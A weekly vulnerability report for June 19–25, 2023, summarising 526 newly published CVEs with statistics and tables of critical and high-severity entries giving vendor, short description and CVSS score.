Weekly Vulnerabilities Reports > June 19 to 25, 2023

Overview

526 new vulnerabilities reported during this period, including 70 critical vulnerabilities and 191 high severity vulnerabilities. This weekly summary report vulnerabilities in 1073 products from 257 vendors including Apple, Dell, Huawei, Mozilla, and Xwiki. Vulnerabilities are notably categorized as "Cross-site Scripting", "Improper Input Validation", "Out-of-bounds Write", "SQL Injection", and "Out-of-bounds Read".

  • 390 reported vulnerabilities are remotely exploitables.
  • 1 reported vulnerabilities have public exploit available.
  • 164 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 332 reported vulnerabilities are exploitable by an anonymous user.
  • Apple has the most reported vulnerabilities, with 71 reported vulnerabilities.
  • Mozilla has the most reported critical vulnerabilities, with 8 reported vulnerabilities.

TOTAL
VULNERABILITIES
CRITICAL RISK
VULNERABILITIES
HIGH RISK
VULNERABILITIES
MEDIUM RISK
VULNERABILITIES
LOW RISK
VULNERABILITIES
REMOTELY
EXPLOITABLE
LOCALLY
EXPLOITABLE
EXPLOIT
AVAILABLE
EXPLOITABLE
ANONYMOUSLY
AFFECTING
WEB APPLICATION

Vulnerability Details

The following table list reported vulnerabilities for the period covered by this report:

Expand/Hide

70 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-19 CVE-2019-25136 Mozilla Unspecified vulnerability in Mozilla Firefox

A compromised child process could have injected XBL Bindings into privileged CSS rules, resulting in arbitrary code execution and a sandbox escape.

10.0
2023-06-22 CVE-2023-36355 TP Link Classic Buffer Overflow vulnerability in Tp-Link Tl-Wr940N Firmware

TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm.

9.9
2023-06-22 CVE-2023-35926 Linuxfoundation Code Injection vulnerability in Linuxfoundation Backstage

Backstage is an open platform for building developer portals.

9.9
2023-06-25 CVE-2023-36660 Nettle Project Out-of-bounds Write vulnerability in Nettle Project Nettle 3.9

The OCB feature in libnettle in Nettle 3.9 before 3.9.1 allows memory corruption.

9.8
2023-06-24 CVE-2023-3197 Inspireui Unspecified vulnerability in Inspireui Mstore API

The MStore API plugin for WordPress is vulnerable to Unauthenticated Blind SQL Injection via the 'id' parameter in versions up to, and including, 4.0.1 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query.

9.8
2023-06-23 CVE-2023-35169 Webklex Path Traversal vulnerability in Webklex PHP-Imap

PHP-IMAP is a wrapper for common IMAP communication without the need to have the php-imap module installed / enabled.

9.8
2023-06-23 CVE-2023-34460 Tauri Improper Authorization vulnerability in Tauri 1.4.0

Tauri is a framework for building binaries for all major desktop platforms.

9.8
2023-06-23 CVE-2022-22630 Apple Use After Free vulnerability in Apple mac OS X and Macos

A use after free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32387 Apple Use After Free vulnerability in Apple Macos

A use-after-free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32412 Apple Use After Free vulnerability in Apple products

A use-after-free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32419 Apple Unspecified vulnerability in Apple Iphone OS

The issue was addressed with improved bounds checks.

9.8
2023-06-23 CVE-2023-3391 Oretnom23 SQL Injection vulnerability in Oretnom23 Human Resource Management System 1.0

A vulnerability was found in SourceCodester Human Resource Management System 1.0.

9.8
2023-06-23 CVE-2023-30258 Magnussolution OS Command Injection vulnerability in Magnussolution Magnusbilling

Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

9.8
2023-06-23 CVE-2023-3383 Game Result Matrix System Project SQL Injection vulnerability in Game Result Matrix System Project Game Result Matrix System 1.0

A vulnerability, which was classified as critical, was found in SourceCodester Game Result Matrix System 1.0.

9.8
2023-06-23 CVE-2023-3380 Wavlink Injection vulnerability in Wavlink Wn579X3 Firmware 20200515

A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615.

9.8
2023-06-23 CVE-2023-33299 Fortinet Deserialization of Untrusted Data vulnerability in Fortinet Fortinac

A deserialization of untrusted data in Fortinet FortiNAC below 7.2.1, below 9.4.3, below 9.2.8 and all earlier versions of 8.x allows attacker to execute unauthorized code or commands via specifically crafted request on inter-server communication port.

9.8
2023-06-22 CVE-2023-28094 Pega Unspecified vulnerability in Pega Platform

Pega platform clients who are using versions 7.4 through 8.8.x and have upgraded from a version prior to 8.x may be utilizing default credentials.

9.8
2023-06-22 CVE-2023-3128 Grafana Authentication Bypass by Spoofing vulnerability in Grafana

Grafana is validating Azure AD accounts based on the email claim.

9.8
2023-06-22 CVE-2023-32571 Dynamic Linq Incorrect Comparison vulnerability in Dynamic-Linq Linq

Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.

9.8
2023-06-22 CVE-2023-2611 Advantech Use of Hard-coded Credentials vulnerability in Advantech R-Seenet

Advantech R-SeeNet versions 2.4.22 is installed with a hidden root-level user that is not available in the users list.

9.8
2023-06-22 CVE-2023-3326 Freebsd Improper Authentication vulnerability in Freebsd

pam_krb5 authenticates a user by essentially running kinit with the password, getting a ticket-granting ticket (tgt) from the Kerberos KDC (Key Distribution Center) over the network, as a way to verify the password.

9.8
2023-06-22 CVE-2023-36097 Funadmin Unrestricted Upload of File with Dangerous Type vulnerability in Funadmin 3.3.2/3.3.3

funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.

9.8
2023-06-22 CVE-2023-35174 Livebook OS Command Injection vulnerability in Livebook

Livebook is a web application for writing interactive and collaborative code notebooks.

9.8
2023-06-22 CVE-2023-20892 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The vCenter Server contains a heap overflow vulnerability due to the usage of uninitialized memory in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit heap-overflow vulnerability to execute arbitrary code on the underlying operating system that hosts vCenter Server.

9.8
2023-06-22 CVE-2023-20893 Vmware Use After Free vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains a use-after-free vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit this issue to execute arbitrary code on the underlying operating system that hosts vCenter Server.

9.8
2023-06-22 CVE-2023-20894 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bound write by sending a specially crafted packet leading to memory corruption.

9.8
2023-06-22 CVE-2023-20895 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains a memory corruption vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger a memory corruption vulnerability which may bypass authentication.

9.8
2023-06-22 CVE-2023-29711 Interlink Unspecified vulnerability in Interlink Psg-5124 Firmware 1.0.4

An incorrect access control issue was discovered in Interlink PSG-5124 version 1.0.4, allows attackers to execute arbitrary code via crafted GET request.

9.8
2023-06-22 CVE-2023-34939 Onlyoffice Path Traversal vulnerability in Onlyoffice

Onlyoffice Community Server before v12.5.2 was discovered to contain a remote code execution (RCE) vulnerability via the component UploadProgress.ashx.

9.8
2023-06-22 CVE-2023-29931 Laravels Project Unspecified vulnerability in Laravels Project Laravels 3.7.35

laravel-s 3.7.35 is vulnerable to Local File Inclusion via /src/Illuminate/Laravel.php.

9.8
2023-06-22 CVE-2023-34601 Jeesite SQL Injection vulnerability in Jeesite

Jeesite before commit 10742d3 was discovered to contain a SQL injection vulnerability via the component ${businessTable} at /act/ActDao.xml.

9.8
2023-06-21 CVE-2023-33584 Enrollment System Project SQL Injection vulnerability in Enrollment System Project Enrollment System 1.0

Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application.

9.8
2023-06-21 CVE-2023-34340 Apache Improper Authentication vulnerability in Apache Accumulo 2.1.0

Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo. This issue affects Apache Accumulo: 2.1.0. Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided.

9.8
2023-06-20 CVE-2023-34563 Netgear Classic Buffer Overflow vulnerability in Netgear R6250 Firmware 1.0.4.48

netgear R6250 Firmware Version 1.0.4.48 is vulnerable to Buffer Overflow after authentication.

9.8
2023-06-20 CVE-2023-33869 Enphase OS Command Injection vulnerability in Enphase Envoy Firmware D7.0.88

Enphase Envoy versions D7.0.88 is vulnerable to a command injection exploit that may allow an attacker to execute root commands.

9.8
2023-06-20 CVE-2023-35885 MGT Commerce Reliance on Cookies without Validation and Integrity Checking vulnerability in Mgt-Commerce Cloudpanel

CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.

9.8
2023-06-20 CVE-2023-3340 Online School Fees System Project SQL Injection vulnerability in Online School Fees System Project Online School Fees System 1.0

A vulnerability was found in SourceCodester Online School Fees System 1.0 and classified as critical.

9.8
2023-06-20 CVE-2020-20413 Wuzhicms SQL Injection vulnerability in Wuzhicms 4.1.0

SQL injection vulnerability found in WUZHICMS v.4.1.0 allows a remote attacker to execute arbitrary code via the checktitle() function in admin/content.php.

9.8
2023-06-20 CVE-2020-20703 VIM Classic Buffer Overflow vulnerability in VIM 8.1.2135

Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.

9.8
2023-06-20 CVE-2020-20718 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluckcms 4.7.10

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

9.8
2023-06-20 CVE-2020-20735 8Cms Unrestricted Upload of File with Dangerous Type vulnerability in 8Cms Ljcms 4.3.R60321

File Upload vulnerability in LJCMS v.4.3.R60321 allows a remote attacker to execute arbitrary code via the ljcms/index.php parameter.

9.8
2023-06-20 CVE-2020-21174 Feehi Unrestricted Upload of File with Dangerous Type vulnerability in Feehi Feehicms 2.0.7.1

File Upload vulenrability in liufee CMS v.2.0.7.1 allows a remote attacker to execute arbitrary code via the image suffix function.

9.8
2023-06-20 CVE-2020-21474 Nucleuscms Unrestricted Upload of File with Dangerous Type vulnerability in Nucleuscms 3.71

File Upload vulnerability in NucleusCMS v.3.71 allows a remote attacker to execute arbitrary code via the /nucleus/plugins/skinfiles/?dir=rsd parameter.

9.8
2023-06-20 CVE-2020-21489 Feehi Unrestricted Upload of File with Dangerous Type vulnerability in Feehi Feehicms 2.0.8

File Upload vulnerability in Feehicms v.2.0.8 allows a remote attacker to execute arbitrary code via the /admin/index.php?r=admin-user%2Fupdate-self component.

9.8
2023-06-20 CVE-2023-34541 Langchain Unspecified vulnerability in Langchain 0.0.171

Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

9.8
2023-06-20 CVE-2023-34600 Adiscon SQL Injection vulnerability in Adiscon Loganalyzer

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

9.8
2023-06-20 CVE-2023-35854 Zohocorp Missing Authentication for Critical Function vulnerability in Zohocorp Manageengine Adselfservice Plus

Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator.

9.8
2023-06-20 CVE-2023-3337 Online Shopping System Advanced Project Improper Authentication vulnerability in Online Shopping System Advanced Project Online Shopping System Advanced 1.0

A vulnerability was found in PuneethReddyHC Online Shopping System Advanced 1.0.

9.8
2023-06-20 CVE-2023-3325 Cmscommander Insufficient Entropy vulnerability in Cmscommander CMS Commander

The CMS Commander plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'cmsc_add_site' function in versions up to, and including, 2.287.

9.8
2023-06-19 CVE-2023-34159 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Improper permission control vulnerability in the Notepad app.Successful exploitation of the vulnerability may lead to privilege escalation, which affects availability and confidentiality.

9.8
2023-06-19 CVE-2023-31411 Sick Missing Authentication for Critical Function vulnerability in Sick Eventcam APP

A remote unprivileged attacker can modify and access configuration settings on the EventCam App due to the absence of API authentication.

9.8
2023-06-19 CVE-2023-2907 Marksoft SQL Injection vulnerability in Marksoft

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Marksoft allows SQL Injection.This issue affects Marksoft: through Mobile:v.7.1.7 ; Login:1.4 ; API:20230605.

9.8
2023-06-19 CVE-2022-47586 Themefic SQL Injection vulnerability in Themefic Ultimate Addons for Contact Form 7

Unauth.

9.8
2023-06-19 CVE-2023-27992 Zyxel OS Command Injection vulnerability in Zyxel Nas326 Firmware, Nas540 Firmware and Nas542 Firmware

The pre-authentication command injection vulnerability in the Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C0, NAS540 firmware versions prior to V5.21(AATB.11)C0, and NAS542 firmware versions prior to V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request.

9.8
2023-06-19 CVE-2023-25736 Mozilla Unspecified vulnerability in Mozilla Firefox

An invalid downcast from `nsHTMLDocument` to `nsIContent` could have lead to undefined behavior.

9.8
2023-06-19 CVE-2023-29542 Mozilla Unspecified vulnerability in Mozilla Firefox

A newline in a filename could have been used to bypass the file extension security mechanisms that replace malicious file extensions such as .lnk with .download.

9.8
2023-06-19 CVE-2023-34416 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 113, Firefox ESR 102.11, and Thunderbird 102.12.

9.8
2023-06-19 CVE-2023-34417 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 113.

9.8
2023-06-19 CVE-2023-29531 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

An attacker could have caused an out of bounds memory access using WebGL APIs, leading to memory corruption and a potentially exploitable crash. *This bug only affects Firefox and Thunderbird for macOS.

9.8
2023-06-19 CVE-2023-32216 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 112.

9.8
2023-06-19 CVE-2023-27396 Omron Missing Authentication for Critical Function vulnerability in Omron products

FINS (Factory Interface Network Service) is a message communication protocol, which is designed to be used in closed FA (Factory Automation) networks, and is used in FA networks composed of OMRON products.

9.8
2023-06-19 CVE-2023-35853 Oisf Unspecified vulnerability in Oisf Suricata

In Suricata before 6.0.13, an adversary who controls an external source of Lua rules may be able to execute Lua code.

9.8
2023-06-19 CVE-2023-35855 Valvesoftware Classic Buffer Overflow vulnerability in Valvesoftware Counter-Strike

A buffer overflow in Counter-Strike through 8684 allows a game server to execute arbitrary code on a remote client's machine by modifying the lservercfgfile console variable.

9.8
2023-06-19 CVE-2023-35856 Nintendo Classic Buffer Overflow vulnerability in Nintendo Mario Kart WII

A buffer overflow in Nintendo Mario Kart Wii RMCP01, RMCE01, RMCJ01, and RMCK01 can be exploited by a game client to execute arbitrary code on a client's machine via a crafted packet.

9.8
2023-06-19 CVE-2023-35857 Siren Insufficient Session Expiration vulnerability in Siren Investigate 12.1.7/13.2.0/13.2.1

In Siren Investigate before 13.2.2, session keys remain active even after logging out.

9.8
2023-06-19 CVE-2023-35839 Solon Deserialization of Untrusted Data vulnerability in Solon

A bypass in the component sofa-hessian of Solon before v2.3.3 allows attackers to execute arbitrary code via providing crafted payload.

9.8
2023-06-23 CVE-2023-35172 Nextcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Nextcloud Server

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

9.1
2023-06-22 CVE-2023-2989 Globalscape Out-of-bounds Read vulnerability in Globalscape EFT Server 6.2.31.2

Fortra Globalscape EFT versions before 8.1.0.16 suffer from an out of bounds memory read in their administration server, which can allow an attacker to crash the service or bypass authentication if successfully exploited

9.1
2023-06-19 CVE-2023-29158 Subnet Authentication Bypass by Capture-replay vulnerability in Subnet Powersystem Center 2020

SUBNET PowerSYSTEM Center versions 2020 U10 and prior are vulnerable to replay attacks which may result in a denial-of-service condition or a loss of data integrity.

9.1
2023-06-19 CVE-2023-29534 Mozilla Unspecified vulnerability in Mozilla Firefox and Firefox Focus

Different techniques existed to obscure the fullscreen notification in Firefox and Focus for Android.

9.1

191 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-25 CVE-2023-36663 IT Novum SQL Injection vulnerability in It-Novum Openitcockpit 4.6.4

it-novum openITCOCKPIT (aka open IT COCKPIT) 4.6.4 before 4.6.5 allows SQL Injection (by authenticated users) via the sort parameter of the API interface.

8.8
2023-06-25 CVE-2023-36630 MGT Commerce Unrestricted Upload of File with Dangerous Type vulnerability in Mgt-Commerce Cloudpanel

In CloudPanel before 2.3.1, insecure file upload leads to privilege escalation and authentication bypass.

8.8
2023-06-24 CVE-2023-1722 Yoga Class Registration System Project Cross-Site Request Forgery (CSRF) vulnerability in Yoga Class Registration System Project Yoga Class Registration System 1.0

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server.

8.8
2023-06-23 CVE-2023-35932 Jcvi Project Improper Validation of Specified Quantity in Input vulnerability in Jcvi Project Jcvi

jcvi is a Python library to facilitate genome assembly, annotation, and comparative genomics.

8.8
2023-06-23 CVE-2023-35165 Amazon Incorrect Authorization vulnerability in Amazon AWS Cloud Development KIT

AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation.

8.8
2023-06-23 CVE-2023-35928 Nextcloud Unspecified vulnerability in Nextcloud Server

Nextcloud Server is a space for data storage on Nextcloud, a self-hosted productivity playform.

8.8
2023-06-23 CVE-2023-34203 Progress Injection vulnerability in Progress Openedge, Openedge Explorer and Openedge Management

In Progress OpenEdge OEM (OpenEdge Management) and OEE (OpenEdge Explorer) before 12.7, a remote user (who has any OEM or OEE role) could perform a URL injection attack to change identity or role membership, e.g., escalate to admin.

8.8
2023-06-23 CVE-2023-36345 Codekop Cross-site Scripting vulnerability in Codekop 2.0

A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.

8.8
2023-06-23 CVE-2023-36348 Codekop Missing Authorization vulnerability in Codekop 2.0

POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.

8.8
2023-06-23 CVE-2023-34672 Elenos Unspecified vulnerability in Elenos Etg150 Firmware 3.12

Improper Access Control leads to adding a high-privilege user affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role within the admin profile.

8.8
2023-06-23 CVE-2023-32373 Apple
Redhat
Use After Free vulnerability in multiple products

A use-after-free issue was addressed with improved memory management.

8.8
2023-06-23 CVE-2023-32435 Apple Out-of-bounds Write vulnerability in Apple products

A memory corruption issue was addressed with improved state management.

8.8
2023-06-23 CVE-2023-32439 Apple Type Confusion vulnerability in Apple products

A type confusion issue was addressed with improved checks.

8.8
2023-06-23 CVE-2023-34671 Elenos Unspecified vulnerability in Elenos Etg150 FM Firmware 3.12

Improper Access Control leads to privilege escalation affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role in the user profile.

8.8
2023-06-23 CVE-2023-35152 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

8.8
2023-06-23 CVE-2023-23679 Jshelpdesk Authorization Bypass Through User-Controlled Key vulnerability in Jshelpdesk

Authorization Bypass Through User-Controlled Key vulnerability in JS Help Desk js-support-ticket allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects JS Help Desk: from n/a through 2.7.7.

8.8
2023-06-23 CVE-2023-36271 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c.

8.8
2023-06-23 CVE-2023-36272 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c.

8.8
2023-06-23 CVE-2023-36273 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c.

8.8
2023-06-23 CVE-2023-36274 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c.

8.8
2023-06-23 CVE-2023-30260 Raspap Command Injection vulnerability in Raspap

Command injection vulnerability in RaspAP raspap-webgui 2.8.8 and earlier allows remote attackers to run arbitrary commands via crafted POST request to hostapd settings form.

8.8
2023-06-23 CVE-2023-31469 Apache Improper Privilege Management vulnerability in Apache Streampipes

A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access.

8.8
2023-06-22 CVE-2023-36239 Libming Classic Buffer Overflow vulnerability in Libming 0.4.7

libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.

8.8
2023-06-22 CVE-2023-34028 Pluginus Cross-Site Request Forgery (CSRF) vulnerability in Pluginus Wolf - Wordpress Posts Bulk Editor and Manager Professional

Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional plugin <= 1.0.7 versions.

8.8
2023-06-22 CVE-2023-23795 WEB Settler Cross-Site Request Forgery (CSRF) vulnerability in Web-Settler Form Builder

Cross-Site Request Forgery (CSRF) vulnerability in Muneeb Form Builder plugin <= 1.9.9.0 versions.

8.8
2023-06-22 CVE-2023-35917 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Paypal Payments

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce PayPal Payments plugin <= 2.0.4 versions.

8.8
2023-06-21 CVE-2023-0971 Silabs Incorrect Authorization vulnerability in Silabs Z/Ip Gateway SDK

A logic error in SiLabs Z/IP Gateway SDK 7.18.02 and earlier allows authentication to be bypassed, remote administration of Z-Wave controllers, and S0/S2 encryption keys to be recovered.

8.8
2023-06-21 CVE-2023-0972 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Z/Ip Gateway SDK

Description: A vulnerability in SiLabs Z/IP Gateway 7.18.01 and earlier allows an unauthenticated attacker within Z-Wave range to overflow a stack buffer, leading to arbitrary code execution.

8.8
2023-06-21 CVE-2023-3110 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Unify Software Development KIT

Description: A vulnerability in SiLabs Unify Gateway 1.3.1 and earlier allows an unauthenticated attacker within Z-Wave range to overflow a stack buffer, leading to arbitrary code execution.

8.8
2023-06-21 CVE-2022-3372 Riello UPS Cross-Site Request Forgery (CSRF) vulnerability in Riello-Ups Netman 204 Firmware 02.05

There is a CSRF vulnerability on Netman-204 version 02.05.

8.8
2023-06-21 CVE-2022-45287 Temenos Unspecified vulnerability in Temenos CWX 8.5.6

An access control issue in Registration.aspx of Temenos CWX 8.5.6 allows authenticated attackers to escalate privileges and perform arbitrary Administrative commands.

8.8
2023-06-20 CVE-2023-35166 Xwiki Unspecified vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-06-20 CVE-2020-20067 Ebcms Unrestricted Upload of File with Dangerous Type vulnerability in Ebcms 1.1.0

File upload vulnerability in ebCMS v.1.1.0 allows a remote attacker to execute arbitrary code via the upload type parameter.

8.8
2023-06-20 CVE-2020-20726 Gilacms Cross-Site Request Forgery (CSRF) vulnerability in Gilacms Gila CMS 1.11.4

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the cm/update_rows/user parameter.

8.8
2023-06-20 CVE-2020-21252 Hongcms Project Cross-Site Request Forgery (CSRF) vulnerability in Hongcms Project Hongcms 3.0.0

Cross Site Request Forgery vulnerability in Neeke HongCMS 3.0.0 allows a remote attacker to execute arbitrary code and escalate privileges via the updateusers parameter.

8.8
2023-06-20 CVE-2020-21325 Wuzhicms Unrestricted Upload of File with Dangerous Type vulnerability in Wuzhicms 4.1.0

An issue in WUZHI CMS v.4.1.0 allows a remote attacker to execute arbitrary code via the set_chache method of the function\common.func.php file.

8.8
2023-06-20 CVE-2023-2533 Papercut Cross-Site Request Forgery (CSRF) vulnerability in Papercut MF and Papercut NG

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in PaperCut NG/MF, which, under specific conditions, could potentially enable an attacker to alter security settings or execute arbitrary code.

8.8
2023-06-20 CVE-2023-26436 Open Xchange Deserialization of Untrusted Data vulnerability in Open-Xchange Appsuite Backend

Attackers with access to the "documentconverterws" API were able to inject serialized Java objects, that were not properly checked during deserialization.

8.8
2023-06-20 CVE-2023-3320 WP Sticky Social Project Unspecified vulnerability in WP Sticky Social Project WP Sticky Social 1.0.1

The WP Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1.

8.8
2023-06-19 CVE-2023-34373 Zephyr Project Manager Project Cross-Site Request Forgery (CSRF) vulnerability in Zephyr Project Manager Project Zephyr Project Manager

Cross-Site Request Forgery (CSRF) vulnerability in Dylan James Zephyr Project Manager plugin <= 3.3.93 versions.

8.8
2023-06-19 CVE-2023-2359 Themepunch Code Injection vulnerability in Themepunch Slider Revolution 3.0.95/4.1.4/4.2.2

The Slider Revolution WordPress plugin through 6.6.12 does not check for valid image files upon import, leading to an arbitrary file upload which may be escalated to Remote Code Execution in some server configurations.

8.8
2023-06-19 CVE-2023-2719 Supportcandy Unspecified vulnerability in Supportcandy

The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the `id` parameter for an Agent in the REST API before using it in an SQL statement, leading to an SQL Injection exploitable by users with a role as low as Subscriber.

8.8
2023-06-23 CVE-2023-32409 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved bounds checks.

8.6
2023-06-23 CVE-2023-32414 Apple Unspecified vulnerability in Apple Macos 13.0/13.0.1/13.1

The issue was addressed with improved checks.

8.6
2023-06-23 CVE-2023-35927 Nextcloud Unspecified vulnerability in Nextcloud Server

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

8.1
2023-06-23 CVE-2023-34465 Xwiki Improper Privilege Management vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

8.1
2023-06-23 CVE-2023-35801 Safe Path Traversal vulnerability in Safe FME Server

A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files.

8.1
2023-06-22 CVE-2023-34923 Topdesk Incorrect Authorization vulnerability in Topdesk 12.10.12

XML Signature Wrapping (XSW) in SAML-based Single Sign-on feature in TOPdesk v12.10.12 allows bad actors with credentials to authenticate with the Identity Provider (IP) to impersonate any TOPdesk user via SAML Response manipulation.

8.1
2023-06-22 CVE-2023-3256 Advantech Externally Controlled Reference to a Resource in Another Sphere vulnerability in Advantech R-Seenet

Advantech R-SeeNet versions 2.4.22 allows low-level users to access and load the content of local files.

8.1
2023-06-19 CVE-2022-46850 Easy Media Replace Project Missing Authorization vulnerability in Easy Media Replace Project Easy Media Replace

Auth.

8.1
2023-06-23 CVE-2023-35150 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.0
2023-06-20 CVE-2020-21366 Njtech Cross-Site Request Forgery (CSRF) vulnerability in Njtech Greencms 2.3

Cross Site Request Forgery vulnerability in GreenCMS v.2.3 allows an attacker to gain privileges via the adduser function of index.php.

8.0
2023-06-25 CVE-2023-36664 Artifex
Debian
Fedoraproject
Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).
7.8
2023-06-23 CVE-2023-27908 Autodesk Uncontrolled Search Path Element vulnerability in Autodesk Installer

A maliciously crafted DLL file can be forced to write beyond allocated boundaries in the Autodesk installer when parsing the DLL files and could lead to a Privilege Escalation vulnerability.

7.8
2023-06-23 CVE-2023-25003 Autodesk Out-of-bounds Write vulnerability in Autodesk products

A maliciously crafted pskernel.dll file in Autodesk AutoCAD 2023 and Maya 2022 may be used to trigger out-of-bound read write / read vulnerabilities.

7.8
2023-06-23 CVE-2023-23516 Apple Unspecified vulnerability in Apple Macos

The issue was addressed with improved memory handling.

7.8
2023-06-23 CVE-2023-23539 Apple Classic Buffer Overflow vulnerability in Apple Macos 13.0/13.0.1/13.1

A buffer overflow issue was addressed with improved memory handling.

7.8
2023-06-23 CVE-2023-27930 Apple Type Confusion vulnerability in Apple products

A type confusion issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32351 Apple Unspecified vulnerability in Apple Itunes

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32353 Apple Unspecified vulnerability in Apple Itunes

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32380 Apple Out-of-bounds Write vulnerability in Apple Macos

An out-of-bounds write issue was addressed with improved bounds checking.

7.8
2023-06-23 CVE-2023-32384 Apple Classic Buffer Overflow vulnerability in Apple products

A buffer overflow was addressed with improved bounds checking.

7.8
2023-06-23 CVE-2023-32398 Apple Use After Free vulnerability in Apple products

A use-after-free issue was addressed with improved memory management.

7.8
2023-06-23 CVE-2023-32405 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved checks.

7.8
2023-06-23 CVE-2023-32434 Apple Integer Overflow or Wraparound vulnerability in Apple products

An integer overflow was addressed with improved input validation.

7.8
2023-06-23 CVE-2023-3302 Admidio Improper Neutralization of Formula Elements in a CSV File vulnerability in Admidio

Improper Neutralization of Formula Elements in a CSV File in GitHub repository admidio/admidio prior to 4.2.9.

7.8
